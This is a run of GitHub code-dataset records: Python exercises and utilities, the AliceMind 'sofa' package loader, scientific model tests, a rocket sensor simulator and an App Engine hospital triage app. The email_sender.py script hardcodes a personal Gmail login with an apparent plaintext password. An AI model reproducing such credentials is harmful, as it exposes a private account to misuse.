않았을 때 수익\n# e는 광고를 했을 때의 수익\n# c는 광고 비용\n# 광고를 해야 하면 \"advertise\", 하지 않아야 하면 \"do not advertise\", 광고를 해도 수익이 차이가 없다면 \"does not matter\"를 출력\n# r 과 e-c를 비교\n\nimport sys\nsys.stdin = open('63_TGN.txt')\n\nt = int(input())\nfor _ in range(t):\n r, e, c = map(int, input().split())\n if r < e-c:\n print('advertise')\n elif r == e-c:\n print('does not matter')\n else:\n print('do not advertise')","repo_name":"leesc8408/TIL","sub_path":"0802/63_TGN.py","file_name":"63_TGN.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"19912824058","text":"import importlib\nimport os\nfrom itertools import chain\nfrom types import ModuleType\nfrom typing import Any\nfrom pkg_resources import get_distribution\nfrom typing import TYPE_CHECKING\n\ntry:\n __version__ = get_distribution('sofa').version\nexcept:\n __version__ = \"1.0.0.local\"\n\n\nclass _DynamicModule(ModuleType):\n def __init__(self, name, module_file, import_structure, module_spec=None, extra_objects=None):\n 
super().__init__(name)\n self._modules = set(import_structure.keys())\n self._class_to_module = {}\n for key, values in import_structure.items():\n for value in values:\n self._class_to_module[value] = key\n # Needed for autocompletion in an IDE\n self.__all__ = list(import_structure.keys()) + list(chain(*import_structure.values()))\n self.__file__ = module_file\n self.__spec__ = module_spec\n self.__path__ = [os.path.dirname(module_file)]\n self._objects = {} if extra_objects is None else extra_objects\n self._name = name\n self._import_structure = import_structure\n\n # Needed for autocompletion in an IDE\n def __dir__(self):\n result = super().__dir__()\n # The elements of self.__all__ that are submodules may or may not be in the dir already, depending on whether\n # they have been accessed or not. So we only add the elements of self.__all__ that are not already in the dir.\n for attr in self.__all__:\n if attr not in result:\n result.append(attr)\n return result\n\n def __getattr__(self, name: str) -> Any:\n if name in self._objects:\n return self._objects[name]\n if name in self._modules:\n value = self._get_module(name)\n elif name in self._class_to_module.keys():\n module = self._get_module(self._class_to_module[name])\n value = getattr(module, name)\n else:\n raise AttributeError(f\"module {self.__name__} has no attribute {name}\")\n\n setattr(self, name, value)\n return value\n\n def _get_module(self, module_name: str):\n try:\n return importlib.import_module(\".\" + module_name, self.__name__)\n except Exception as e:\n raise RuntimeError(\n f\"Failed to import {self.__name__}.{module_name} because of the following error (look up to see its traceback):\\n{e}\"\n ) from e\n\n def __reduce__(self):\n return self.__class__, (self._name, self.__file__, self._import_structure)\n\n\ndef environ(backend):\n os.environ[\"SOFA_BACKEND\"] = backend\n from .models import sbert, veco, SbertConfig, SbertTokenizer, SbertTokenizerFast, SbertModel, SbertForSequenceClassification\n from .models import SbertForTokenClassification, SbertForQuestionAnswering, SbertForMultipleChoice, SbertForPreTraining\n from .models import SbertForMaskedLM, SbertForNextSentencePrediction, VecoConfig, VecoTokenizer\n from .models import VecoTokenizerFast, VecoModel, VecoForSequenceClassification, \\\n VecoForMultipleChoice, VecoForTokenClassification, VecoForQuestionAnswering\n from .models import palm, PalmConfig, PalmTokenizer, PalmTokenizerFast, PalmModel, PalmForConditionalGeneration\n from .utils import inject_model_backend\n inject_model_backend(\"sbert\", \"structbert\", SbertConfig, SbertTokenizer,\n SbertTokenizerFast, backbone=SbertModel,\n sequence_classification=SbertForSequenceClassification,\n token_classification=SbertForTokenClassification,\n question_answering=SbertForQuestionAnswering,\n multiple_choice=SbertForMultipleChoice,\n pre_train=SbertForPreTraining,\n mlm=SbertForMaskedLM,\n nsp=SbertForNextSentencePrediction,\n module=sbert)\n inject_model_backend(\"veco\", \"veco\", VecoConfig, VecoTokenizer,\n VecoTokenizerFast, backbone=VecoModel,\n sequence_classification=VecoForSequenceClassification,\n token_classification=VecoForTokenClassification,\n question_answering=VecoForQuestionAnswering,\n multiple_choice=VecoForMultipleChoice,\n slow_to_fast_converter=\"XLMRobertaTokenizer\",\n module=veco)\n inject_model_backend(\"palm\", \"palm\", PalmConfig, PalmTokenizer,\n PalmTokenizerFast, backbone=PalmModel,\n s2slm=PalmForConditionalGeneration,\n module=palm)\n\n\n_import_structure = {\n 
\"utils\": [\n \"ChildTuningAdamW\",\n \"apply_child_tuning_to_trainer\",\n \"apply_child_tuning\",\n \"PretrainedConfig\",\n \"TaskType\",\n \"ACT2FN\",\n \"InferenceBase\",\n \"PreTrainedModel\",\n \"Application\",\n \"OnnxConfig\",\n \"apply_chunking_to_forward\",\n \"find_pruneable_heads_and_indices\",\n \"prune_linear_layer\",\n \"ModelOutput\",\n \"logging\",\n \"add_code_sample_docstrings\",\n \"replace_return_docstrings\",\n \"add_start_docstrings\",\n \"add_start_docstrings_to_model_forward\",\n \"add_end_docstrings\",\n \"BaseModelOutputWithPastAndCrossAttentions\",\n \"BaseModelOutputWithPoolingAndCrossAttentions\",\n \"CausalLMOutputWithCrossAttentions\",\n \"MaskedLMOutput\",\n \"MultipleChoiceModelOutput\",\n \"NextSentencePredictorOutput\",\n \"QuestionAnsweringModelOutput\",\n \"SequenceClassifierOutput\",\n \"TokenClassifierOutput\",\n \"DatasetOutput\",\n \"SpanClassifierOutput\",\n \"PreTrainedTokenizer\",\n \"_is_control\",\n \"_is_punctuation\",\n \"_is_whitespace\",\n \"AddedToken\",\n \"PreTrainedTokenizerFast\",\n \"check_update\",\n \"inject_model_backend\",\n \"inject_pipeline\"\n ],\n \"models\": [\n \"sbert\",\n \"veco\",\n \"palm\",\n \"SbertConfig\",\n \"SbertTokenizer\",\n \"SbertTokenizerFast\",\n \"SbertForSequenceClassification\",\n \"SbertModel\",\n \"SbertForQuestionAnswering\",\n \"SbertForTokenClassification\",\n \"SbertForMultipleChoice\",\n \"SbertForPreTraining\",\n \"SbertForMaskedLM\",\n \"SbertForNextSentencePrediction\",\n \"VecoConfig\",\n \"VecoModel\",\n \"VecoForSequenceClassification\",\n \"VecoForMultipleChoice\",\n \"VecoForQuestionAnswering\",\n \"VecoForTokenClassification\",\n \"VecoTokenizer\",\n \"VecoTokenizerFast\",\n \"PalmConfig\",\n \"PalmModel\",\n \"PalmTokenizer\",\n \"PalmTokenizerFast\",\n \"PalmForConditionalGeneration\",\n ],\n \"examples\": [\n \"run_sequence_labeling_hf\",\n \"run_classification_hf\",\n \"run_generation_hf\"\n ],\n \"sofa\": [\n \"environ\"\n ]\n}\n\nif TYPE_CHECKING:\n from .models import (\n sbert,\n veco,\n palm,\n SbertConfig,\n SbertTokenizer,\n SbertTokenizerFast,\n SbertForSequenceClassification,\n SbertModel,\n SbertForQuestionAnswering,\n SbertForTokenClassification,\n SbertForMultipleChoice,\n SbertForPreTraining,\n SbertForMaskedLM,\n SbertForNextSentencePrediction,\n VecoConfig,\n VecoModel,\n VecoForSequenceClassification,\n VecoForMultipleChoice,\n VecoForQuestionAnswering,\n VecoForTokenClassification,\n VecoTokenizer,\n VecoTokenizerFast,\n PalmConfig,\n PalmModel,\n PalmTokenizer,\n PalmTokenizerFast,\n PalmForConditionalGeneration,\n )\n from .examples import (\n run_sequence_labeling_hf,\n run_classification_hf,\n run_generation_hf,\n )\n from .utils import *\nelse:\n import sys\n sys.modules[__name__] = _DynamicModule(\n __name__,\n globals()[\"__file__\"],\n _import_structure,\n module_spec=__spec__,\n extra_objects={\"__version__\": __version__, \"environ\": environ},\n )\n\n","repo_name":"alibaba/AliceMind","sub_path":"sofa/sofa/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8141,"program_lang":"python","lang":"en","doc_type":"code","stars":1868,"dataset":"github-code","pt":"85"} +{"seq_id":"73535851477","text":"import smtplib\nfrom email.message import EmailMessage\nfrom string import Template\nfrom pathlib import Path\n# p = Path('.')\n\n# print(list(p.glob('**/*.html')))\n\nhtml = Template(Path('email-playground/index.html').read_text())\n\nemail = EmailMessage()\nemail['from'] = 'Arfizur Rahman'\nemail['to'] = 
'arfizrahman0@gmail.com'\nemail['subject'] = 'Sending Email via Python'\n\nemail.set_content(html.substitute({'name': 'TinTin'}), 'html')\n\nwith smtplib.SMTP(host='smtp.gmail.com', port=587) as smtp:\n smtp.ehlo()\n smtp.starttls()\n smtp.login('rifatrabbi872@gmail.com', 'RifatRabbi872@')\n smtp.send_message(email)\n print('All good boss!')\n","repo_name":"arfizurrahman/python","sub_path":"Scripting with Python/Email/email-playground/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13407486692","text":"from PIL import ImageGrab\nimport cv2\nimport os\nimport platform\nimport pyperclip\nimport pytesseract\nimport time\nimport shutil\n\nOS_NAME = platform.system()\nIMG_EXTENSIONS = [\".jpg\", \".jpeg\", \".png\", \".bmp\"]\nTESSERACT_WINDOWS_PATH = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\nIMG_PATH = \"images\"\n\n\ndef check_image_folder_exist():\n\tif not os.path.exists(IMG_PATH):\n\t\tos.makedirs(IMG_PATH)\n\ndef get_all_images_names():\n\timg_array = []\n\tcheck_image_folder_exist()\n\n\tfor image_name in os.listdir(IMG_PATH):\n\t\tif image_name.lower().endswith(tuple(IMG_EXTENSIONS)):\n\t\t\timg_array.append(image_name)\n\treturn img_array\n\ndef change_image_path_folder(path):\n\tglobal IMG_PATH\n\tIMG_PATH = path\n\ndef get_clipboard_image():\n\treturn ImageGrab.grabclipboard()\n\ndef text_from_clipboard_image(clipboard_image, lang=\"eng\"):\n\tcheck_image_folder_exist()\n\n\tclipboard_image_name = f\"image_{str(time.time())}.jpg\"\n\tclipboard_image.save(f\"images/{clipboard_image_name}\")\n\tclipboard_image_text = recognize_text(clipboard_image_name, lang)\n\n\tos.remove(f\"images/{clipboard_image_name}\")\n\tpyperclip.copy(clipboard_image_text)\n\treturn clipboard_image_text\n\ndef recognize_text(image_full_name, lang=\"eng\"):\n\tfull_path = os.path.abspath(f\"{IMG_PATH}\\{image_full_name}\")\n\t_, file_extension = os.path.splitext(image_full_name)\n\tlocal_image_path = \"images\"\n\tlocal_image_name = f\"image_{str(time.time())}.{file_extension}\"\n\tshutil.copyfile(full_path, f\"{local_image_path}/{local_image_name}\")\n\n\timage = cv2.imread(f\"{local_image_path}/{local_image_name}\")\n\tif OS_NAME == \"Windows\":\n\t\tpytesseract.pytesseract.tesseract_cmd = TESSERACT_WINDOWS_PATH\n\ttext = pytesseract.image_to_string(image, lang).strip()\n\tos.remove(f\"{local_image_path}/{local_image_name}\")\n\n\treturn text\n\ndef text_delimiter(full_text, delimiter_name):\n\tstart = f\" Get best model predictions\n wrapper_mdoel_dict = train_clusteiring_wrapper(\n df, model_sel_params, metrics_computation, initial_recommended_features\n )\n df_with_initial_clusters = wrapper_mdoel_dict[\"df_cluster\"]\n return df_with_initial_clusters\n\n\ndef tree_based_feature_selection(\n df_with_initial_clusters: pd.DataFrame,\n target_based_fs_ranking: pd.DataFrame,\n fs_params: Dict,\n explainer_model_params: Dict,\n importance_model_params: Dict,\n) -> pd.DataFrame:\n \"\"\"Reorder-Supervised FS Ranking into an Unsupervised FS ranking.\n\n Reorder FS ranking according a feature importance model (Random Forest Optimzed with Bayesian Opt),\n an gives explainability insights though an explainer model (DT Optimzed with Bayesian Opt).\n\n Args:\n df_with_initial_clusters (pd.DataFrame): Master table with cluster columns\n target_based_fs_ranking (pd.DataFrame): Target based feature selection ranking.\n fs_params (Dict): Feature selection 
params.\n explainer_model_params (Dict): Explainer model params.\n importance_model_params (Dict): Importance model params.\n\n Returns:\n pd.DataFrame: Unsupervised Feature Selection Ranking.\n \"\"\"\n # params\n id_col = fs_params[\"customer_id_col\"]\n # initial receommendation from feature selection\n initial_recommended_features = list(target_based_fs_ranking[\"feature\"].values) + [\n id_col\n ]\n # explain clustering predictions with Bagging or Bossting algorithms + tree plot from a decision tree model\n explainer_dict = clustering_explainer(\n df_with_initial_clusters,\n fs_params,\n initial_recommended_features,\n explainer_model_params,\n importance_model_params,\n )\n # initial feature importance from the explainer\n feature_importance_df = explainer_dict[\"feature_importance\"]\n\n # recommend features with feature importance greater than a threshold.\n feature_importance_threshold = fs_params[\"final_ranking\"][\n \"feature_importance_threshold\"\n ]\n recommended_features = feature_importance_df[\n feature_importance_df[\"feature_importance\"] > feature_importance_threshold\n ][\"feature_name\"].to_list()\n\n msg1 = f\"Features recommended to use on the macro clusters embeddings: {recommended_features}\"\n msg2 = f\"wich have a feature importance greater than {feature_importance_threshold}\"\n logger.warning(msg1 + msg2)\n return feature_importance_df\n","repo_name":"matheus695p/classifiers","sub_path":"src/classifiers/pipelines/data_science/feature_selection/feature_selection_nodes.py","file_name":"feature_selection_nodes.py","file_ext":"py","file_size_in_byte":62835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"17463807630","text":"from aol_model.aod import Aod\nfrom aol_model.ray import Ray\nfrom aol_model.acoustics import Acoustics\nfrom aol_model.xu_stroud_model import diffract_acousto_optically,diffract_by_wavevector_triangle,get_efficiency\nfrom aol_model.vector_utils import normalise\nimport pytest\nfrom numpy import allclose, all, array, pi\nfrom random import random\nfrom scipy import less_equal, greater_equal\n\nacoustics = Acoustics(40e6)\naod = Aod([0,0,1], [1,0,0], 1e-3, 1e-3, 1e-3)\norder = 1\nwavelen = 800e-9\n\ndef test_efficiency_range():\n \n def eff_fun():\n v = normalise([random(),random(),10])\n rays_in = [Ray([0,0,0],v,wavelen,1)]\n rays_out = [Ray([0,0,0],v,wavelen,1)]\n wavevecs_in_mag = [r.wavevector_vac_mag for r in rays_in]\n wavevecs_in_unit = [r.wavevector_unit for r in rays_in] \n wavevecs_out_mag = [r.wavevector_vac_mag for r in rays_out]\n wavevecs_out_unit = [r.wavevector_unit for r in rays_out] \n return get_efficiency(aod, random(), wavevecs_in_mag, wavevecs_in_unit, wavevecs_out_mag, wavevecs_out_unit, [acoustics], (0,1))\n \n effs = [ eff_fun() for _ in range(100) ]\n assert all(less_equal(effs,1)) and all(greater_equal(effs,0)) \n\ndef test_order_sym():\n r1 = Ray([0,0,0],[-17./145,0,144./145],wavelen)\n r2 = Ray([0,0,0],[ 17./145,0,144./145],wavelen)\n \n diffract_acousto_optically(aod, [r1], [acoustics], -1)\n diffract_acousto_optically(aod, [r2], [acoustics], 1)\n \n opposite_xcomps = allclose(r1.wavevector_unit[0], -r2.wavevector_unit[0])\n assert allclose(r1.energy, r2.energy) and opposite_xcomps \n\ndef test_wavevector_triangle():\n wavevec_unit = array([0,0,1])\n wavevec_mag = 2 * pi / wavelen \n (wavevector_mismatch_mag, wavevectors_out_unit, wavevectors_vac_mag_out) = diffract_by_wavevector_triangle(aod, array([wavevec_unit]), [wavevec_mag], [acoustics], order, 
(0,1))\n k_i = wavevec_unit * wavevec_mag * aod.calc_refractive_indices_vectors([wavevec_unit], wavelen)[0][0]\n k_d = wavevectors_out_unit * wavevectors_vac_mag_out * aod.calc_refractive_indices_vectors(wavevectors_out_unit, wavelen)[1] # get ord branch, the first of\n K = acoustics.wavevector(aod) * order\n zero_sum = k_i + order * K + aod.normal * wavevector_mismatch_mag - k_d[0]\n assert allclose(zero_sum, 0, atol=0.2, rtol=0)\n\ndef test_setting_invalid_mode():\n with pytest.raises(ValueError):\n ray = Ray([0,0,0,], [0,0,1], wavelen)\n diffract_acousto_optically(aod, [ray], [acoustics], 2)\n \nif __name__ == '__main__':\n test_wavevector_triangle()","repo_name":"GeoffEvans/aol_model","sub_path":"aol_model/tests/test_xu_stroud_model.py","file_name":"test_xu_stroud_model.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"22274159782","text":"from random import seed \nfrom random import gauss \n\n\npressure_sensor_relative_accuracy = 8 # pa \npressure_sensor_absolute_accuracy = 50 # pa\n\naccelerometer_sensor_relative_accuracy = 0.03 # % accuracy \naccelerometer_sensor_absolute_accuracy = 0 \n\nclass SensorDataCreator: \n def __init__(self, flight_data):\n # break down the flight data into individual arrays \n\n # create the sensor data at a given time step for each sensor \n self._pressure_data_time_step = 0.05 \n self._accel_data_time_step = 0.01\n \n self._position_data = []\n self._acceleration_data = [] \n self._attitude_data = [] \n self._time = [] \n # break apart the sensor data \n for i in flight_data: \n self._position_data.append(i['position']) \n self._acceleration_data.append(i['acceleration'])\n self._attitude_data.append(i['attitude']) \n self._time.append(i['flight_time']) \n\n self._pressure_sensor_data = self.create_pressure_sensor_data(self._position_data, self._time, self._pressure_data_time_step) \n self._accel_sensor_data = self.create_accel_sensor_data(self._acceleration_data, self._time, self._accel_data_time_step)\n # self.accel_data = self.create_accel_sensor_data()\n print(self._pressure_sensor_data)\n\n\n def get_pressure_sensor_data(self, time):\n # step through to find the time \n # start with a guess based on the time \n index_guess = time / self._pressure_data_time_step - 1 \n if(index_guess < 0):\n index_guess = 0 \n elif(index_guess > len(self._pressure_sensor_data)):\n index_guess = len(self.create_accel_sensor_data) - 1 \n # return the data at the index \n return self._pressure_sensor_data[index_guess][0]\n \n \n\n\n def create_pressure_sensor_data(self, altitude_data, time_data, sensor_time_step):\n # simulate pressure sensor data \n # make the data lag behind the actual altitude \n # add gaussian noise \n alt_press = [\n [-1000, 113900],\n [0, 101325],\n [1000, 89880],\n [2000, 79500],\n [3000, 70120],\n [4000, 61660]\n ]\n\n # calculate the ideal air pressure at all altitudes \n ideal_pressure = [] \n \n for a in altitude_data: \n altitude = a[2] \n # calc pressure \n iter = 1\n done = False \n while(iter < len(alt_press) and not done): \n if(altitude < alt_press[iter][0]):\n delta_p = alt_press[iter][1] - alt_press[iter - 1][1] \n delta_a = alt_press[iter][0] - alt_press[iter - 1][0]\n pressure = alt_press[iter - 1][1] + (altitude - alt_press[iter - 1][0]) * delta_p / delta_a \n ideal_pressure.append(pressure)\n done = True \n iter += 1 \n #print(\"Done 1\")\n # print(ideal_pressure)\n # return ideal_pressure\n # give the data a lag \n 
start_pressure = ideal_pressure[0] \n lagged_data = [start_pressure] \n for i in range(1, len(ideal_pressure)):\n delta_t = time_data[i] - time_data[i - 1]\n delat_p = ideal_pressure[i] - ideal_pressure[i - 1]\n lagged_data.append(ideal_pressure[i]) # todo test out this model \n # print(\"Done 2\")\n # give the pressure data a constant offset \n offset = gauss(0, pressure_sensor_absolute_accuracy) \n # add the offset everywhere \n lagged_offset_pressure = []\n for i in range(0, len(lagged_data)): \n lagged_offset_pressure.append(lagged_data[i] + offset) \n\n # match the sensor time step and add gaussian noise \n elements = (int)(time_data[-1] / sensor_time_step + 0.5) \n # print(\"Elements: \", elements)\n data = [] \n sens_time = 0 \n index = 1 \n while(index < len(time_data) - 2): \n # find the appropriate time \n if(sens_time > time_data[index]): \n index += 1 \n delta_p = lagged_offset_pressure[index] - lagged_offset_pressure[index - 1]\n delta_t = time_data[index] - time_data[index + 1] \n approx = lagged_offset_pressure[index - 1] + (sens_time - time_data[index]) * delat_p / delta_t\n data.append([gauss(approx, pressure_sensor_relative_accuracy), sens_time]) \n sens_time += sensor_time_step \n \n return data \n\n def create_accel_sensor_data(self, acceleration_data, time_data, sensor_time_step): \n # simulate acceleration data \n # give the data a small scale offset \n # add gaussian noise \n\n #offset = gauss(0, accelerometer_sensor_absolute_accuracy) \n # add the offset as a percentage \n\n # create the sensor data at the requested frequency \n elements = (int)(time_data[-1] / sensor_time_step + 0.5) \n # print(\"Elements: \", elements)\n data = [] \n sens_time = 0 \n index = 1 \n while(index < len(time_data) - 2): \n # find the appropriate time \n if(sens_time > time_data[index]): \n index += 1 \n delta_a = acceleration_data[index][2] - acceleration_data[index - 1][2]\n delta_t = time_data[index] - time_data[index + 1] \n approx = acceleration_data[index - 1][2] + (sens_time - time_data[index]) * delta_a / delta_t\n data.append([approx, sens_time]) \n sens_time += sensor_time_step \n\n # add nonlinearity error to the data \n non_linear_data = [] \n for i in data:\n non_linear_data.append((gauss(i[0], 0.03*i[0]),i[1])) \n \n # add the absolute error to the data \n noisy_data = []\n for i in non_linear_data:\n noisy_data.append([i[0] + gauss(0, 0.05),i[1]])\n \n\n # return data \n return noisy_data \n \n\n \n\n\n\nif __name__ == \"__main__\":\n import SimulationKinematics \n from SimulationKinematics import rocket_data, rocket_state, simulation_settings\n test_rocket = rocket_data; \n test_rocket['dry_mass'] = 11.5 \n test_rocket['drag_reference_area'] = 0.0103\n test_rocket['drag_cd_v'] = [[0.46, 0], [0.43, 34.3], [0.43, 68.6], [0.44, 102.9], [0.46,137.2], [0.47, 171.5], [0.5, 205.8], [0.53, 240.1]]\n test_rocket['motor_file_name'] = \"./Cesaroni_2788L1030-P.rse\"\n sim_settings = simulation_settings \n sim_settings['time_step'] = 0.05\n simulation = SimulationKinematics.SimulationKinematics(test_rocket, sim_settings)\n data = simulation.simulate() \n\n sensor = SensorDataCreator(data)\n ","repo_name":"jeremymdunne/PeregrineGroundStation","sub_path":"SensorDataCreator.py","file_name":"SensorDataCreator.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"24495478469","text":"import urllib\nimport os\nimport pytz\nimport datetime\n\nfrom google.appengine.api import users\nfrom 
google.appengine.ext import ndb\nfrom read_exosite import dataCapture\nfrom read_exosite import icCapture\n\nimport webapp2\nimport jinja2\nimport random\n\n# Tell program where your templates are\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__) + \"/templates\"),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\ndef datetimeformat(value, format='(%d-%m-%Y) %H:%M:%S'):\n return value.strftime(format)\n\nJINJA_ENVIRONMENT.filters['datetimeformat'] = datetimeformat\n\nDEFAULT_HOSPITAL_NAME = 'SGH'\n\n# We set a parent key on the 'Greetings' to ensure that they are all\n# in the same entity group. Queries across the single entity group\n# will be consistent. However, the write rate should be limited to\n# ~1/second.\n\ndef hospital_key(hospital_name=DEFAULT_HOSPITAL_NAME):\n \"\"\"Constructs a Datastore key for a Hospital entity.\n\n We use hospital_name as the key.\n \"\"\"\n return ndb.Key('Hospital', hospital_name)\n\n\nclass HospitalStaff(ndb.Model):\n \"\"\"Sub model for representing a hospital staff.\"\"\"\n identity = ndb.StringProperty(indexed=False)\n email = ndb.StringProperty(indexed=False)\n\n\nclass PatientProfile(ndb.Model):\n \"\"\"A main model for representing an individual Patient entry.\"\"\"\n hospitalStaff = ndb.StructuredProperty(HospitalStaff)\n # Profile information\n name = ndb.StringProperty()\n nric_num = ndb.StringProperty()\n gender = ndb.StringProperty(indexed=False)\n nationality = ndb.StringProperty(indexed=False)\n dob = ndb.StringProperty(indexed=False)\n race = ndb.StringProperty(indexed=False)\n mobile_number = ndb.StringProperty(indexed=False)\n address = ndb.StringProperty(indexed=False)\n zipcode = ndb.StringProperty(indexed=False)\n add_info = ndb.StringProperty(indexed=False)\n # Triage Readings\n date = ndb.DateTimeProperty(auto_now_add=True)\n travel_history = ndb.StringProperty(indexed=False)\n chief_complaint = ndb.StringProperty(indexed=False)\n classification = ndb.IntegerProperty(indexed=False)\n mouseArray = ndb.StringProperty(indexed=False)\n\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('main.html')\n self.response.write(template.render())\n\n\nclass ListAll(webapp2.RequestHandler):\n def post(self):\n nric_num = self.request.get('nric_num')\n self.redirect(\"/triage?nric=\" + nric_num)\n\n def get(self):\n hospital_name = self.request.get('hospital_name',\n DEFAULT_HOSPITAL_NAME)\n readings_query = PatientProfile.query(\n ancestor=hospital_key(hospital_name)).order(PatientProfile.date)\n readings = readings_query.fetch(100)\n\n user = users.get_current_user()\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n local_tz = pytz.timezone('Asia/Singapore')\n for reading in readings:\n dt = reading.date\n reading.date = dt.replace(tzinfo=pytz.utc).astimezone(local_tz).replace(tzinfo=None)\n\n template_values = {\n 'user': user,\n 'readings': readings,\n 'hospital_name': urllib.quote_plus(hospital_name),\n 'url': url,\n 'url_linktext': url_linktext,\n }\n\n template = JINJA_ENVIRONMENT.get_template('listall.html')\n self.response.write(template.render(template_values))\n\n\nclass Create(webapp2.RequestHandler):\n def get(self):\n nric_num = self.request.get('nric')\n if len(nric_num) == 0 :\n template_values = {\n 'nric_num': nric_num,\n }\n template = JINJA_ENVIRONMENT.get_template('registration.html')\n 
self.response.write(template.render(template_values))\n else:\n reading = PatientProfile.get_by_id(id=nric_num, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n template_values = {\n 'nric_num': nric_num,\n 'reading': reading\n }\n template = JINJA_ENVIRONMENT.get_template('registration_scanner.html')\n self.response.write(template.render(template_values))\n\n def post(self):\n # We set the same parent key on the 'PatientProfile' to ensure each\n # PatientProfile is in the same entity group. Queries across the\n # single entity group will be consistent. However, the write\n # rate to a single entity group should be limited to\n # ~1/second.\n patient_nric = self.request.get('nricNum')\n reading = PatientProfile( id=patient_nric, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n\n if users.get_current_user():\n reading.hospitalStaff = HospitalStaff(\n identity=users.get_current_user().user_id(),\n email=users.get_current_user().email())\n\n patient_name = self.request.get('name')\n patient_gender = self.request.get('gender')\n patient_dob = self.request.get('dob')\n patient_race = self.request.get('race')\n patient_mobile_num = self.request.get('mobile_number')\n patient_address = self.request.get('address')\n patient_zipcode = self.request.get('zipcode')\n patient_add_info = self.request.get('add_info')\n patient_nationality = self.request.get('nationality')\n\n # Do some input validation before putting data into Datastore\n #if patient_nric.isalnum() and len(patient_nric) == 9 : (remove this since ID is 3 digit)\n reading.name = patient_name\n reading.nric_num = patient_nric\n reading.gender = patient_gender\n reading.dob = patient_dob\n reading.race = patient_race\n reading.mobile_number = patient_mobile_num\n reading.address = patient_address\n reading.zipcode = patient_zipcode\n reading.add_info = patient_add_info\n reading.nationality = patient_nationality\n reading.put()\n\n query_params = {'hospital_name': DEFAULT_HOSPITAL_NAME}\n self.redirect(\"listall\")\n\n\nclass Triage(webapp2.RequestHandler):\n def get(self):\n i=0;\n w, h = 2, 10;\n a = [[0 for x in range(w)] for y in range(h)] \n print(\"a \")\n print(a)\n data = dataCapture()\n data.reverse()\n print(\"data \")\n print(data)\n \n # for response in data:\n response = data[0]\n time=datetime.datetime.fromtimestamp(int(response[0])).strftime('%d/%m %H:%M')\n datastring = str(response[1])\n a[h - 1][0] = time\n a[h - 1][1] = datastring\n # i = i + 1\n\n ic = icCapture()\n print(\"a again \")\n print(a)\n # count = PatientProfile.all(keys_only=True).count() + 1\n #count = 300 + 1\n #if (ic[0][1] == '') :\n # nric = count\n #else:\n nric = ic[0][1]\n nric_num = self.request.get('nric')\n if len(nric_num) == 0 :\n reading = PatientProfile.get_by_id(id=nric, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n print(reading)\n template_values = {\n 'nric_num': nric,\n 'a': a,\n #'nric_num': nric_num,\n #'reading' : PatientProfile.get_by_id(id=nric_num, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n 'time': time,\n 'datastring': datastring,\n 'reading': reading,\n }\n if reading == None :\n template = JINJA_ENVIRONMENT.get_template('triage.html')\n else :\n template = JINJA_ENVIRONMENT.get_template('triage_registered.html')\n \n self.response.write(template.render(template_values))\n else:\n reading = PatientProfile.get_by_id(id=nric_num, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n template_values = {\n 'time': time,\n 'datastring': datastring,\n 'a': a,\n 'nric_num': nric_num,\n 'reading': reading,\n }\n template = 
JINJA_ENVIRONMENT.get_template('triage_registered.html')\n self.response.out.write(template.render(template_values))\n # if reading.classification == 0:\n # measurements = classify_patient()\n # else:\n # measurements = {'bp': reading.bp, 'respo_rate': reading.respo_rate, 'temperature': round(reading.temperature, 1),\n # 'heart_rate': reading.heart_rate, 'classification': reading.classification}\n def post(self):\n # We set the same parent key on the 'PatientProfile' to ensure each\n # PatientProfile is in the same entity group. Queries across the\n # single entity group will be consistent. However, the write\n # rate to a single entity group should be limited to\n # ~1/second.\n patient_nric = self.request.get('nric')\n reading = PatientProfile( id=patient_nric, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n\n if users.get_current_user():\n reading.hospitalStaff = HospitalStaff(\n identity=users.get_current_user().user_id(),\n email=users.get_current_user().email())\n\n patient_name = self.request.get('name')\n patient_gender = self.request.get('gender')\n patient_dob = self.request.get('dob')\n patient_race = self.request.get('race')\n patient_mobile_num = self.request.get('mobile_number')\n patient_address = self.request.get('address')\n patient_zipcode = self.request.get('zipcode')\n patient_add_info = self.request.get('add_info')\n patient_nationality = self.request.get('nationality')\n # Get triage information\n patient_travel_history = self.request.get('travel_history')\n patient_chief_complaint = self.request.get('chief_complaint')\n patient_classification = self.request.get('classification')\n patient_mouseArray = self.request.get('mouseArray')\n\n # Do some input validation before putting data into Datastore\n #if patient_nric.isalnum() and len(patient_nric) == 9 : (remove this part since we ID is 3 digit)\n reading.name = patient_name\n reading.nric_num = patient_nric\n reading.gender = patient_gender\n reading.dob = patient_dob\n reading.race = patient_race\n reading.mobile_number = patient_mobile_num\n reading.address = patient_address\n reading.zipcode = patient_zipcode\n reading.add_info = patient_add_info\n reading.nationality = patient_nationality\n # Add triage information into database\n reading.travel_history = patient_travel_history\n reading.chief_complaint= patient_chief_complaint\n reading.classification = int(patient_classification)\n reading.mouseArray = patient_mouseArray\n reading.put()\n\n query_params = {'hospital_name': DEFAULT_HOSPITAL_NAME}\n self.redirect(\"listall\")\n\nclass Faq(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('faq.html')\n self.response.write(template.render())\n\n def post(self):\n 